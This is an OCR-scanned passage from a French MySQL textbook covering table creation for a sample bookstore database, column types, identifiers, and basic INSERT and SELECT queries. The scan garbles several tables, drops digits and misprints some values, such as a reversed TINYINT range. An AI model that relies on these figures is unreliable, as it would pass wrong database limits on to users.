UNSIGNED apres un type entier signifie qu'il ne peut pas prendre une valeur negative. 

Analyse des types de colonnes 

Prenons comme exemple la premiere table : 
create table clients 

( idclient int unsigned not null auto_increment primary key, 
nom char(50) not null, 
adresse char(100) not null, 
ville char(30) not null 

); 

Lorsqu'une table est creee, il faut choisir le type de chaque colonne. 

Pour la table clients, nous avons bien quatre colonnes, comme l'indiquait notre 
schema. La premiere colonne, idclient, correspond a la cle primaire, que nous avons 
indiquee directement. Nous avons choisi qu'elle contiendrait des nombres entiers (e'est- 
a-dire des donnees de type int) et que ces identifiants seraient non signes (de type unsi 
gned). Nous nous sommes egalement servis de auto increment, pour que MySQL 
puisse gerer ces informations a notre place : cela fait toujours une chose de moins a faire. 

Toutes les autres colonnes contiennent des chames de caracteres, e'est pourquoi nous 
avons choisi le type char. Ce type indique des champs de largeur fixe. Cette taille est 
donnee entre crochets, done, par exemple, nom peut contenir jusqu'a cinquante caracteres. 

Ce type de donnees alloue cinquante caracteres pour chaque entree, meme si tous les 
caracteres ne sont pas utilises. MySQL completera alors les donnees avec des espaces 
pour les justifier sur cinquante caracteres. Nous aurions pu choisir le type varchar, qui 
permet d'allouer uniquement la memoire necessaire pour chaque champ (plus un octet). 
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Une fois encore, il s'agit d'un petit compromis : varchar utilise moins de place, mais 
char est plus rapide. 

Vous remarquerez que toutes les colonnes sont declarees comme etant NOT NULL. II 
s'agit d'une petite optimisation qu'il ne faut pas hesiter a mettre en ceuvre lorsque c'est 
possible. 

Nous reviendrons sur les questions d'optimisation au Chapitre 12. 

La syntaxe de certaines instructions CREATE est legerement differente. Examinons main- 
tenant la table commandes : 

create table commandes 

( idcommande int unsigned not null auto_increment primary key, 
idclient int unsigned not null, 
montant float(6,2) , 
date date not null 

); 

La colonne montant est indiquee comme un nombre a virgule flottante de type float. 
Avec la plupart des types de donnees flottantes, il est possible de preciser la largeur de 
l'affichage et le nombre de chiffres apres la virgule. Dans ce cas, le montant des 
commandes sera en euros, c'est pourquoi nous avons choisi une largeur assez impor- 
tante (6) et deux chiffres decimaux, pour les centimes. 

La colonne date possede le type de donnees date. 

Dans cette table particuliere, toutes les colonnes (sauf montant) sont marquees avec NOT 
NULL. En effet, lorsqu'une commande est entree dans la base de donnees, nous devons 
l'ajouter dans la table des commandes, puis ajouter les elements correspondants dans 
commandes livres avant de traiter la commande. II est done tout a fait possible que 
nous ne connaissions pas le montant de la commande lorsque celle-ci est effectuee, 
c'est pourquoi nous l'autorisons a etre NULL. 

La table livres possede des caracteristiques similaires : 

create table livres 

( isbn char(13) not null primary key, 

auteur char(50) , 

titre char(100) , 

prix float(4,2) 

); 

Ici, nous n'avons pas besoin de produire une cle primaire parce que les numeros ISBN 
sont crees a un autre endroit. Les autres champs peuvent etre NULL, puisqu'une librairie 
peut connaitre le code ISBN d'un livre avant de connaitre ses autres caracteristiques 
(titre, auteur ou prix). 
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La table livres commandes montre comment creer une cle primaire sur plusieurs colonnes : 

create table livres_commandes 

( idcommande int unsigned not null, 

isbn char(13) not null, 

quantite tinyint unsigned, 

primary key (idcommande, isbn) 

); 

Nous avons indique les quantites de livres avec TINYINT UNSIGNED, qui peut contenir 
des nombres entiers positifs compris entre et 255. 

Comme nous 1' avons deja mentionne, les cles primaires reparties sur plusieurs colonnes 
doivent etre specifiees avec une clause de cle primaire particuliere. C'est ce que nous 
utilisons ici. 

Pour terminer, voici la table commentaires livres_: 

create table commentaires_livres 
( 

isbn char(13) not null primary key, 
commentaire text 

); 

Cette table utilise un nouveau type de donnees, text, que nous n' avons pas encore 
mentionne. Ce type est interessant pour les chaines de caracteres plus longues, comme 
un commentaire ou un article. II en existe plusieurs variantes, que nous examinerons un 
peu plus loin dans ce chapitre. 

Pour comprendre plus finement la creation des tables, interessons-nous aux noms des 
colonnes et aux identificateurs en general, puis aux types de donnees que nous pouvons 
choisir pour les colonnes. Mais, pour 1' instant, examinons d'abord la base de donnees 
que nous venons de creer. 

Examiner la base de donnees avec SHOW et DESCRIBE 

Ouvrez une session avec le moniteur MySQL et selectionnez la base de donnees 
livres. Vous pouvez afficher les tables de cette base de donnees en saisissant la 
commande suivante : 

mysql> show tables; 

MySQL affiche alors la liste de toutes les tables de cette base de donnees : 

+ + 

| Tables in livres | 
+ + 

| clients 

j commandes 

j commentaires_livres 

j livres 

j livres_commandes 

+ + 

5 rows in set (0.06 sec) 
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Vous pouvez egalement vous servir de la commande show pour afficher la liste des 
bases de donnees, par exemple avec la commande suivante : 

mysql> show databases; 

Si vous ne possedez pas le privilege SHOW DATABASES, vous ne verrez que la liste des 
bases de donnees pour lesquelles vous possedez des privileges. 

Pour afficher plus d' informations sur une table particuliere, par exemple la table 
livres, servez-vous de DESCRIBE : 

mysql> describe livres; 

MySQL affiche alors les informations que vous avez fournies lors de la creation de la 
base de donnees : 

| Field | Type | Null | Key | Default | Extra | 

| isbn | char(13) | NO | PRI | NULL 

| auteur | char(50) | YES | NULL 

| titre | char(100) | YES | NULL 

| prix | float(4,2) | YES | | NULL | j 

4 rows in set (0.00 sec) 

Ces commandes sont utiles pour vous rappeler le type de donnees d'une colonne ou 
pour parcourir une base de donnees que vous n' avez pas creee vous-meme. 

Creation d'index 

Nous avons deja rapidement fait mention des index car la designation de cles primaires 
cree automatiquement des index sur les colonnes concernees. 

L'un des problemes courants auxquels sont confronted les nouveaux utilisateurs MySQL 
concerne le regret que ces derniers expriment au sujet des mauvaises performances de 
cette base de donnees qu'on leur a pourtant annoncee etre rapide comme 1' eclair. Ce 
probleme de performances survient parce qu'ils n'ont pas cree d'index sur leur base de 
donnees (il est en effet possible de creer des tables sans cle primaire et sans index). 

Pour commencer, les index qui ont ete automatiquement crees pour vous feront 
1' affaire. Si vous constatez que vous devez executer un grand nombre de requetes sur 
une colonne qui n'est pas une cle, il peut etre souhaitable d'ajouter un index sur cette 
colonne afin d'ameliorer les performances. Vous pouvez le faire avec 1' instruction 
CREATE INDEX, dont la syntaxe est la suivante : 

CREATE [UNIQUE | FULLTEXT] INDEX nom_index 

ON nom_table (nom_colonne_index [(longueur)] [ASC|DESC], ...]) 

Les index FULLTEXT sont utilises pour indexer des champs texte. Nous reviendrons sur 
ce sujet au Chapitre 13. 
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Le champ facultatif longueur permet de preciser que seuls les longueur premiers 
caracteres du champ doivent etre indexes. Vous pouvez egalement indiquer si l'index 
doit etre croissant (ASC) ou decroissant (DESC) ; par defaut, les index sont croissants. 

Identificateurs MySQL 

II existe cinq types d'identificateurs dans MySQL : les bases de donnees, les tables, les 
colonnes, les index, que nous connaissons deja, et les alias, que nous etudierons au 
prochain chapitre. 

Avec MySQL, les bases de donnees correspondent a des repertoires et les tables, a des 
fichiers du systeme de fichiers sous-jacent. Cette correspondance a un effet direct sur les 
noms que vous pouvez leur donner. Elle influe egalement sur la casse de ces noms : si votre 
systeme d'exploitation tient compte de la difference entre les majuscules et les minuscules 
dans les noms des repertoires et des fichiers, les noms des bases de donnees et des tables 
seront egalement sensibles a cette difference. Unix, par exemple, fait la distinction entre 
les majuscules et les minuscules, ce qui n'est pas le cas de Windows. Quel que soit le 
systeme d'exploitation sous-jacent, les noms des colonnes et des alias ne tiennent en 
revanche jamais compte des majuscules et des minuscules, bien que vous ne puissiez 
pas utiliser differentes casses du meme nom dans une meme instruction SQL. 

En outre, 1' emplacement des repertoires et des fichiers contenant vos donnees depend 
de votre configuration. Vous pouvez connaitre cet emplacement grace a l'utilitaire 
mysqladmin : 

> mysqladmin -h hote -u root -p variables 

Recherchez la variable datadir dans le resultat de la commande precedente. 

Le Tableau 9.4 presente un resume des differents identificateurs. II faut egalement 
savoir qu'il est impossible d'utiliser les caracteres ASCII et 255 ni l'apostrophe dans 
les identificateurs. 

Tableau 9.4 : Identificateurs MySQL 

Type Longueur Majuscules/ Caracteres autorises 

maximale minuscules 

Bases 64 Comme le SE N'importe quel caractere autorise dans les noms des 

de donnees repertoires de votre systeme d'exploitation (SE), 

sauf les caracteres / , \ et . 

Table 64 Comme le SE N'importe quel caractere autorise dans les noms des 

fichiers de votre systeme d'exploitation, sauf les 
caracteres / et . 
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Tableau 9.4 : Identificateurs MySQL (suite) 



Type 


Longueur 
maximale 


Majuscules/ 
minuscules 


Caracteres autorises 


Colonne 


64 


Non 


N'importe lesquels 


Index 


64 


Non 


N'importe lesquels 


Alias 


255 


Non 


N'importe lesquels 



Ces regies sont extremement souples. Vous pouvez meme utiliser des mots reserves, ou 
des caracteres speciaux, la seule limitation etant que si vous utilisez cette caracteristique il 
faudra placer vos identificateurs entre apostrophes inversees (Alt Gr+e sur les claviers 
francais pour PC, la touche a gauche de Entree sur les claviers francais pour Mac) : 

create database "create database'; 

Naturellement, cette liberte supplementaire ne doit etre utilisee qu'a bon escient. Ce 
n'est pas parce que vous pouvez appeler une base de donnees * create database'* qu'il 
faut le faire. Ce principe reste valable dans n'importe quel type de programmation : il 
faut toujours utiliser des identificateurs evocateurs. 

Types des colonnes 

Les colonnes des tables MySQL peuvent etre des nombres, des dates et des heures, ou 
des chaines de caracteres. Chacune de ces categories compte plusieurs types differents 
que nous allons resumer ici. Au Chapitre 12, nous etudierons leurs avantages et leurs 
inconvenients. 

II existe plusieurs variantes de ces trois categories en fonction de leur taille de stockage. 
Lorsque Ton choisit un type de colonne, il faut generalement choisir le type le plus petit 
dans lequel vos donnees peuvent entrer. 

Pour de nombreux types, vous pouvez specifier la longueur maximale d'affichage (qui 
correspond au parametre M dans les tableaux suivants) lorsque vous creez une colonne. Si 
ce parametre est facultatif, il est indique entre crochets. La valeur maximale de M est 255. 

Dans les descriptions qui suivent, les autres valeurs facultatives sont presentees entre 
crochets. 

Types numeriques 

Les types numeriques sont des nombres entiers ou des nombres a virgule flottante. Pour 
les nombres a virgule flottante, vous pouvez preciser le nombre de chiffres apres la 
virgule (parametre D). La valeur maximale de D est la plus petite valeur entre 30 et M 2 



252 Partie II 



Utilisation de MySQL 



(c'est-a-dire la longueur maximale d'affichage moins deux : un caractere pour le point 
et un pour la partie entiere du nombre). 

Pour les types entiers, vous pouvez utiliser l'attribut UNSIGNED pour n'accepter que des 
nombres positifs, comme le montre le Listing 9. 1. 

Pour tous les types numeriques, vous pouvez utiliser l'attribut ZEROFILL. Lorsque les 
valeurs d'une colonne ZEROFILL sont affichees, elles sont justifiees a gauche avec des 0. 
Une colonne avec l'attribut ZEROFILL est automatiquement consideree comme UNSIGNED. 

Les types entiers sont presentes dans le Tableau 9.5, qui donne a la fois les intervalles 
signes et non signes pour les valeurs possibles. 

Tableau 9.5 : Types de donnees entiers 



Type Intervalle Tattle (octets) Description 



TINYINT[ (M) ] 


-127..128,ou0..255 


1 


Entiers tres courts 


BIT 






Synonyme de TINYINT 


BOOL 






Synonyme de TINYINT 


SMALLINT[ (M) ] 


-32 768.32 767, ou 0..65 535 


2 


Entiers courts 


MEDIUMINT[ (M) ] 


-8 388 608.. 8 388 607, ou 
0..16 777 215 


3 


Entiers de taille moyenne 


INT[ (M) ] 


-2 31 ..2 31 - 1, ou 0..2 32 -l 


4 


Entiers classiques 


INTEGER [ (M) ] 






Synonyme de INT 


BIGINT[ (M) ] 


-2 63 ..2 63 -l,ou 0..2 64 -l 


8 


Entiers larges 


Les types a vir£ 


;ule flottante sont presentes dans le Tableau 9.6. 


Tableau 9.6 : Types de donnees a virgule flottante 






Type 


Intervalle 


Tattle 
(octets) 


Description 


FLOAT 

(precision) 


Depend de la precision 


Variable 


Peut etre utilise pour representer 
des nombres a virgule flottante 
en simple ou double precision. 


FLOAT [ (M, D) ] 


+1.175494351E-38, 
±3.402823466E+38 


4 


Nombres a virgule flottante en 
simple precision. Equivalent a 



FLOAT ( 4 ) , mais avec une largeur 
d'affichage et un nombre de 
chiffres apres la virgule. 
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Tableau 9.6 : Types de donnees a virgule flottante (suite) 



Type 


Intervalle 


Taille 
(octets) 


Description 


DOUBLE [ (M,D) ] 


+1 797693 1348623 157E+308 
±2.2250738585072014E-308 


8 


Nombres a virgule flottante en 
double precision. Equivalent a 
FLOAT ( 8 ) , mais avec une largeur 
d'affichage et un nombre de 
chiffres apres la virgule. 


DOUBLE PRECISION 
[(M,D)] 


Comme ci-dessus 




Synonyme de DOUBLE [ (M, D)]. 


REAL[ (M,D) ] 


Comme ci-dessus 




Synonyme de DOUBLE [ (M, D)]. 


DECIMAL 
t(M[,D])] 


Variable 


M+2 


Nombres a virgule flottante 
enregistre comme un type char. 
L' intervalle depend de M, la 
largeur d'affichage. 


NUMERIC [ (M, D) ] 


Comme ci-dessus 




Synonyme de DECIMAL. 


DEC[ (M,D) ] 


Comme ci-dessus 




Synonyme de DECIMAL. 


FIXED[ (M,D) ] 


Comme ci-dessus 




Synonyme de DECIMAL. 



Types de dates et d'heures 

MySQL prend en charge plusieurs types de dates et d'heures, presentes dans le 
Tableau 9.7. Grace a tous ces types, vous pouvez saisir vos donnees sous la forme d'une 
chame de caracteres ou sous un format numerique. Une colonne TIMESTAMP d'une ligne 
particuliere prend automatiquement la date et l'heure de la derniere operation sur cette 
ligne, a moins que vous ne la definissiez manuellement. Cette caracteristique est tres 
utile pour le suivi des transactions. 

Tableau 9.7 : Types de dates et d'heures 



Type Intervalle Description 



DATE 


1000-01-01,9999-12-31 


Une date, affichee au format YYYY MM DD. 


TIME 


-838:59:59, 838:59:59 


Une heure, affichee au format HH : MM : SS. 






Vous remarquerez que cet intervalle est 






beaucoup plus grand que ce que Ton utilise 






ordinairement. 


DATETIME 


1000-01-01 00:00:00, 


Une date et une heure, affichees au format 




9999-12-31 23:59:59 


YYYY MM DDHH : MM : SS. 
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Tableau 9.7 : Types de dates et d'heures (suite) 

Type Intervalle Description 

TIMESTAMP[ (M) ] 1970-01-01 00:00:00 Une date complete (ou etiquette temporelle), 

utile pour identifier les transactions. Le format 
d'affichage depend de la valeur de M (voir le 
Tableau 9.8). La valeur maximale depend de 
la limite d'Unix, qui se situe parfois en 2037. 

YEAR [ {2 1 4) ] 70-69 (1970-2069), Une annee, au format 2 ou 4 chiffres. Chacun 

1901-2155 de ces formats correspond a un intervalle. 



Le Tableau 9.8 presente les differents types d'affichages de TIMESTAMP. 



Tableau 9.8 : Les types d'affichages de TIMESTAMP 



Type specifie 


Affichage 


TIMESTAMP 


YYYYMMDDHHMMSS 


TIMESTAMP (14) 


YYYYMMDDHHMMSS 


TIMESTAMP (12) 


YYMMDDHHMMSS 


TIMESTAMP (10) 


YYMMDDHHMM 


TIMESTAMP (8) 


YYYYMMDD 


TIMESTAMP (6) 


YYMMDD 


TIMESTAMP (4) 


YYMM 


TIMESTAMP (2) 


YY 



Types de chaines 

II existe trois types de chaines. Tout d'abord les chames classiques, c'est-a-dire des 
chames de texte courtes. Ces chaines correspondent aux types CHAR (longueur fixe) et 
VARCHAR (longueur variable). Vous pouvez specifier la largeur de ces chames. Les 
colonnes de type CHAR sont justifiees avec des espaces pour atteindre la taille indiquee, 
alors que la taille de stockage des colonnes VARCHAR varie automatiquement en fonction 
de leur contenu. MySQL supprime les espaces places a la fin des CHAR lorsqu'ils sont 
lus et ceux des VARCHAR lorsqu'ils sont stockes. Le choix entre ces deux types revient a 
faire un compromis entre l'espace de stockage et la vitesse. Nous y reviendrons au 
Chapitre 12. 
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II existe egalement les types TEXT et BLOB, dans differentes tailles. Ces types correspon- 
dent a des donnees texte ou binaires plus longues. Les BLOB sont des "objets binaires de 
grande taille" (Binary Large OBjects). lis peuvent contenir ce que vous voulez, comme 
des images ou du son. 

Dans la pratique, les colonnes BLOB et TEXT sont identiques, sauf que les colonnes BLOB 
tiennent compte de la difference majuscules/minuscules, contrairement aux colonnes TEXT. 
Comme ces types de colonnes peuvent contenir des donnees tres volumineuses, leur 
emploi necessite certaines precautions. Nous evoquerons ce probleme au Chapitre 12. 

Le troisieme groupe contient deux types speciaux, SET et ENUM. Le type SET permet de 
preciser que les valeurs d'une colonne doivent faire partie d'un certain ensemble de 
valeurs. Les valeurs de la colonne peuvent contenir plusieurs valeurs provenant de cet 
ensemble. Vous pouvez avoir au maximum 64 elements provenant de 1' ensemble specine. 

ENUM ressemble beaucoup a SET, sauf que les colonnes de ce type ne peuvent contenir 
qu'une seule des valeurs indiquees, ou NULL. Par ailleurs, une enumeration ne peut pas 
contenir plus de 65 535 elements. 

Les types de chaines sont resumes dans les Tableaux 9.9, 9.10 et 9.11. Le Tableau 9.9 
presente les types de chaines classiques. 



Tableau 9.9 : Types de chaines classiques 



Type 



Intervalle Description 



[NATIONAL] CHAR (M) 
[BINARY | ASCII | 
UNICODE] 



CHAR [NATIONAL] 

[NATIONAL] VARCHAR (M) 
[BINARY] 



a 255 Chame de taille fixe, de longueur M, ou M est compris 

entre et 255. Le mot-cle NATIONAL precise qu'on doit 
utiliser le jeu de caracteres par defaut. Cela correspond 
au comportement par defaut de MySQL, mais il peut 
egalement etre precise parce qu'il fait partie du standard 
SQL ANSI. Le mot-cle BINARY indique que les donnees 
doivent etre traitees en respectant les majuscules et les 
minuscules (le comportement par defaut consiste a 
ignorer la casse). Le mot-cle ASCII precise que la 
colonne utilisera le jeu de caracteres latinl. Le mot-cle 
UNICODE indique que le jeu de caracteres sera ucs. 

Synonyme de CHAR ( 1 ) . 

1 a 255 Comme ci-dessus, sauf que la longueur est variable. 



Le Tableau 9.10 resume les types TEXT et BLOB. La longueur maximale d'un champ 
TEXT (en caracteres) correspond a la taille maximale en octets des fichiers qui doivent 
etre enregistres dans ce champ. 
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Tableau 9.10 : Types TEXTet BLOB 



Type 


Longueur maximale (caracteres) 


Description 


TINYBLOB 


2 8 - 1 (c'est-a-dire 255) 


Un petit champ BLOB 


TINYTEXT 


2 8 - 1 (c'est-a-dire 255) 


Un petit champ TEXT 


BLOB 


2 16 - 1 (c'est-a-dire 65 535) 


Un champ BLOB de taille normale 


TEXT 


2 16 - 1 (c'est-a-dire 65 535) 


Un champ TEXT de taille normale 


MEDIUMBLOB 


2 24 - 1 (c'est-a-dire 16 777 215) 


Un champ BLOB de taille moyenne 


MEDIUMTEXT 


2 24 - 1 (c'est-a-dire 16 777 215) 


Un champ TEXT de taille moyenne 


LONGBLOB 


2 32 - 1 (c'est-a-dire 4 294 967 295) 


Un champ BLOB de grande taille 


LONGTEXT 


2 32 - 1 (c'est-a-dire 4 294 967 295) 


Un champ TEXT de grande taille 


Le Tableau 9.11 presente les types ENUM et SET. 




Tableau 9.11 : Types SETet ENUM 




Type 


Maximum de valeurs 
dans V ensemble 


Description 


ENUM( ' valeurl ' . 


'valeur2' , . . .) 65 535 


Les colonnes de ce type ne 
peuvent contenir qu'une seule 
des valeurs enumerees, ou NULL. 


SET( ' valeurl 1 , 


1 valeur2' , . . . ) 64 


Les colonnes de ce type peuvent 



contenir un ensemble de valeurs 
parmi celles de la liste, ou NULL. 



Pour aller plus loin 

Pour plus d' informations, reportez-vous au chapitre du manuel en ligne qui concerne la 
configuration d'une base de donnees, sur le site http://www.mysql.com/. 

Pour la suite 

Maintenant que vous savez comment creer des utilisateurs, des bases de donnees et des 
tables, vous pouvez vous interesser a 1' interaction avec la base de donnees. Nous 
verrons au prochain chapitre comment inserer des donnees dans des tables, comment 
les mettre a jour, les supprimer et comment interroger la base. 



10 



Travailler avec une base 
de donnees MySQL 

Dans ce chapitre, nous presenterons SQL (Structured Query Language) et nous verrons 
comment l'utiliser pour interroger des bases de donnees. Nous continuerons le develop- 
pement de la base de donnees Book-O-Rama en apprenant a inserer, a supprimer et a 
mettre a jour des donnees. Nous verrons egalement comment interroger la base de 
donnees. 

Nous commencerons par presenter SQL et verrons en quoi cet outil peut nous etre utile. 

Si vous n'avez pas encore configure la base de donnees de Book-O-Rama, vous devez 
le faire avant d'executer les requetes SQL de ce chapitre. Vous trouverez tous les details 
de cette procedure au Chapitre 9. 

Qu'est-ce que SQL ? 

SQL signifie Structured Query Language, ou "langage de requetes structure". C'est le 
langage le plus employe par les systemes de gestion de bases de donnees relationnelles 
(SGBDR) pour stocker et recuperer les donnees. II est utilise par des systemes de bases 
de donnees comme MySQL, Oracle, PostgreSQL, Sybase et Microsoft SQL Server, 
pour ne citer qu'eux. 

Bien qu'il y ait pour SQL un standard ANSI que les systemes de bases de donnees 
comme MySQL s'efforcent de respecter, il existe toutefois quelques differences subfi- 
les entre ce SQL standard et le SQL de MySQL. II est prevu que certaines d'entre elles 
soient resorbees dans les versions futures afin de se rapprocher du standard, mais 
d'autres sont deliberees. Nous signalerons les plus importantes a mesure de notre 
expose. Pour une liste exhaustive des differences entre le SQL version ANSI et celui de 
MySQL, consultez le manuel en ligne de MySQL. Vous trouverez cette page a l'URL 
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suivante, ainsi qu' a plusieurs autres endroits : http://dev.mysql.eom/doc/refman/5.l/ 
en/compatibility.html . 

Vous avez peut-etre deja entendu employer les termes langage de definition des donnees 
(LDD) pour la definition des bases de donnees et langage de manipulation des 
donnees (LMD) pour 1' interrogation des bases de donnees. SQL comprend les deux. 
Au Chapitre 9, nous avons presente la definition des donnees (LDD) en SQL et nous 
nous en sommes done deja un peu servis. Le LDD permet de mettre en place une base 
de donnees. 

La partie LMD de SQL sert bien plus souvent, puisqu'on l'utilise a chaque fois que Ton 
enregistre ou que Ton lit des donnees dans une base de donnees. 

Insertion de donnees dans une base de donnees 

Avant de pouvoir travailler avec une base de donnees, vous devez y enregistrer des 
informations. La plupart du temps, vous vous servirez de l'instruction INSERT. 

Rappelez-vous que les SGBDR contiennent des tables qui renferment a leur tour des 
lignes de donnees, organisees en colonnes. Chaque ligne d'une table decrit normale- 
ment un objet du mode reel ou une relation, et les valeurs d'une colonne pour une ligne 
donnee correspondent aux informations relatives a un objet reel particulier. Nous 
pouvons nous servir de 1' instruction INSERT pour ajouter des lignes de donnees dans la 
base de donnees. 

La syntaxe de INSERT est la suivante : 

INSERT [INTO] table [(colonnel, colonne2, colonne3, . . .)] VALUES 
{valeurl , valeur2, valeur3, . . .); 

Pour, par exemple, inserer une ligne dans la table Clients de Book-O-Rama, vous 
pouvez saisir la commande suivante : 

insert into clients values 

(NULL, 'Julie Dupont 1 , '25 rue noire', 'Toulouse'); 

Vous remarquerez que nous avons remplace table par le nom de la table dans laquelle 
nous souhaitions placer nos donnees et que nous avons place les valeurs a inserer dans 
la liste qui suit la clause values. Toutes les valeurs de cet exemple ont ete mises entre 
apostrophes simples. Avec MySQL, les chaines de caracteres doivent toujours etre 
mises entre apostrophes simples ou doubles (dans ce livre, nous utiliserons ces deux 
types d' apostrophes). Les nombres et les dates n'en ont pas besoin. 

L'instruction INSERT merite quelques commentaires. 

Les valeurs indiquees sont utilisees pour remplir la table, dans l'ordre ou elles sont 
fournies. Cependant, si vous souhaitez remplir uniquement certaines colonnes ou si 
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vous voulez donner les valeurs dans un ordre different, vous pouvez preciser le nom des 
colonnes dans 1' instruction. Par exemple : 

insert into clients (nom, ville) values 
('Melissa Martin 1 , 'Albi'); 

Cette approche n'est interessante que si vous possedez des donnees partielles pour un 
enregistrement particulier ou si certains champs de l'enregistrement sont facultatifs. 
Voici une autre syntaxe similaire : 

insert into clients 

set nom = 'Michel Archer', 

adresse = "12 Avenue plate' , 

ville = ' Montauban ' ; 

Vous remarquerez egalement que nous avons donne la valeur NULL a la colonne 
idclient lorsque nous avons ajoute Julie Dupont et que nous avons ignore cette 
colonne lorsque nous avons ajoute les autres clients. Vous vous rappelez peut-etre que, 
lorsque nous avons configure la base de donnees, nous avons indique que idclient 
etait la cle primaire de la table clients : cette procedure peut done vous sembler 
etrange. Cependant, nous avions egalement attribue l'attribut AUTO INCREMENT a ce 
champ, ce qui signifie que si nous inserons une ligne avec la valeur NULL (ou aucune 
valeur) dans ce champ, MySQL produira le nombre suivant dans la sequence d'auto- 
incrementation et l'inserera automatiquement a notre place. Cette fonctionnalite est 
particulierement appreciable. 

II est egalement possible d'inserer plusieurs lignes d'un seul coup dans une table. 
Chaque ligne doit etre mise entre parentheses et les ensembles de parentheses doivent 
etre separes par des virgules. 

L'instruction INSERT n'a que peu de variantes. Apres le mot INSERT, vous pouvez ajou- 
ter les mots-cles LOW PRIORITY ou DELAYED. Le premier indique que le systeme peut 
attendre et effectuer l'insertion plus tard, lorsqu'il n'y aura plus de lecture dans la table. 
Le second, que les donnees inserees seront mises en tampon. Si le serveur est occupe, 
vous pouvez done continuer a executer des requetes au lieu d' avoir a attendre que 
1' operation INSERT soit terminee. 

Immediatement apres ces mots-cles, vous pouvez eventuellement ajouter IGNORE pour 
qu'une tentative d'insertion de lignes produisant une cle dupliquee supprime ces lignes 
sans prevenir. L autre solution consiste a utiliser ON DUPLICATE KEY UPDATE expression 
a la fin de l'instruction INSERT. Cette clause permet de modifier la valeur dupliquee en 
utilisant une instruction UPDATE classique (voir plus loin dans ce chapitre). 

Nous avons reuni quelques donnees pour remplir la base de donnees grace a quelques 
instructions INSERT qui se servent de l'approche multiligne que nous venons d'evoquer. 
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Le script correspondant se trouve sur le site Pearson, dans le fichier 
\chapitrelO\insertion_livres.sql. Vous le trouverez egalement dans le Listing 10.1. 

Listing 10.1 : insertionsjivres.sql — Script SQL de remplissage des tables de Book-O-Rama 



use livres; 

insert into clients values 

(3, 'Julie Dupont, '25 rue noire', 'Toulouse'), 

(4, 'Alain Wong', '147 Avenue Haines', 'Bordeaux'), 

(5, 'Michelle Arthur', '357 rue de Paris', ' Ramonville ' ) ; 

insert into commandes values 

(NULL, 3, 69.98, '2007-04-02'), 
(NULL, 1, 49.99, '2007-04-15'), 
(NULL, 2, 74.98, '2007-04-19'), 
(NULL, 3, 24.99, '2007-05-01'); 

insert into livres values 

('0-672-31697-8', 'Michael Morgan', 

'Java 2 for Professional Developers', 34.99), 
(' 0-672-31745-1 ' , 'Thomas Down', 'Installing Debian GNU/Linux', 24.99), 
('0-672-31509-2', 'Pruitt, et al.', 'Teach Yourself GIMP in 24 Hours', 

24.99) , 

('0-672-31769-9', 'Thomas Schenk', 
'Caldera OpenLinux System Administration Unleashed', 49.99); 

insert into livres commandes values 



(1 , 


'0- 


672- 


31697- 


8' 


2 


(2, 


'0- 


672- 


31769- 


9' 


1 


(3, 


'0- 


672- 


31769- 


9' 


1 


(3, 


'0- 


672- 


31509- 


2' 


1 


(4, 


'0- 


672- 


31745- 


1 ' 


3 



insert into commentaires_livres values 

('0-672-31697-8', ' Le livre de Morgan est bien ecrit et va bien 

au-dela de la plupart des livres sur Java.'); 



Vous pouvez executer ce script en ligne de commande en l'envoyant a MySQL via un 
pipeline, comme ici: 

> mysql -h note -u bookorama -p livres < path/ vers/insertions_livres . sql 

Recuperation des donnees dans la base de donnees 

L'instruction principale de SQL est SELECT. Elle permet de recuperer des donnees dans 
une base de donnees en selectionnant les lignes qui correspondent a certains criteres. 
L'instruction SELECT reconnait beaucoup d'options et peut etre utilisee de plusieurs 
manieres tres differentes. 
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Void la syntaxe d'une instruction SELECT : 

SELECT [options] elements 

[INTO fichier] 

FROM tables 

[ WHERE conditions ] 

[ GROUP BY regroupement ] 

[ HAVING proprietes ] 

[ ORDER BY liste_tri] 

[LIMIT limite ] 

[PROCEDURE nom_proc(parametres)] 

[options de verrouillage] 

j 

Nous reviendrons un peu plus loin sur toutes les clauses de cette instruction. Pour 
l'instant, examinons une requete sans aucune clause facultative, c'est-a-dire une 
requete simple qui selectionne des elements dans une table particuliere. Typiquement, 
ces elements sont des colonnes de la table, mais il peut egalement s'agir des resultats de 
n'importe quelle expression MySQL. Nous reviendrons sur les plus utiles un peu plus 
loin dans cette section. Cette requete renvoie le contenu des colonnes nom et ville de la 
table clients : 

select nom, ville 
from clients; 

Cette requete renvoie le resultat suivant, en supposant que vous ayez saisi les donnees 
du Listing 10.1 et que vous ayez execute les deux autres instructions INSERT citees a 
titre d'exemple : 



nom 


| ville 

_ + 


Julie Dupont 


| Toulouse 


Alain Wong 


| Bordeaux 


Michelle Arthur 


| Ramonville 


Melissa Martin 


| Albi 


Michal Archer 


| Montauban 




.4- 



Comme vous pouvez le constater, nous obtenons une table qui contient les elements 
selectionnes (nom et ville), a partir de la table que nous avons specifiee, clients. Ces 
donnees sont issues de toutes les lignes de la table clients. 

Vous pouvez indiquer autant de colonnes que vous le souhaitez, en les mentionnant 
apres le mot-cle select. Vous pouvez aussi specifier d'autres elements, comme le joker 
(*), qui symbolise toutes les colonnes de la table concernee. Pour, par exemple, afficher 
toutes les colonnes et toutes les lignes de la table livres commandes, nous pouvons 
utiliser 1' instruction suivante : 

select * 

from livres_commandes ; 
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Cette commande renvoie la sortie suivante : 



+ + + + 

| idcommande | isbn | quantite | 

+ + + + 

| 1 | 0-672-31697-8 | 2 | 

2 | 0-672-31769-9 | 1 | 

3 | 0-672-31769-9 | 1 | 

3 | 0-672-31509-2 | 1 | 

4 | 0-672-31745-1 | 3 | 
+ + + + 



Recuperer des donnees ayant des criteres specifiques 

Pour acceder a un sous-ensemble de lignes d'une table, nous devons indiquer plusieurs 
criteres de selection a l'aide de la clause WHERE. Par exemple : 

select * 

from commandes 

where idclient = 3; 

selectionne toutes les colonnes de la table commandes, mais uniquement pour les lignes 
dont le idclient vaut 3. Voici le resultat obtenu : 

| idcommande | idclient | montant | date | 

1 | 3 | 69.98 | 2007-04-02 | 

| 4 | 3 | 24.99 | 2007-05-01 j 

La clause WHERE precise les criteres utilises pour selectionner les lignes. Dans notre 
exemple, nous avons selectionne les lignes dont le idclient vaut 3. En SQL, c'est le 
signe egal qui permet de tester 1' egalite : c'est done different de PHP et c'est une source 
d'erreur frequente lorsqu'on utilise conjointement ces deux langages. 

Outre le test d'egalite, MySQL dispose de plusieurs operateurs de comparaison et 
d'expressions regulieres, dont les plus courants sont presentes dans le Tableau 10.1. 
Notez bien qu'il ne s'agit pas d'une liste complete ; en cas de besoin, reportez-vous au 
manuel de MySQL. 



Tableau 10.1 : Les operateurs de comparaison utiles dans les clauses WHERE 



Operateur 


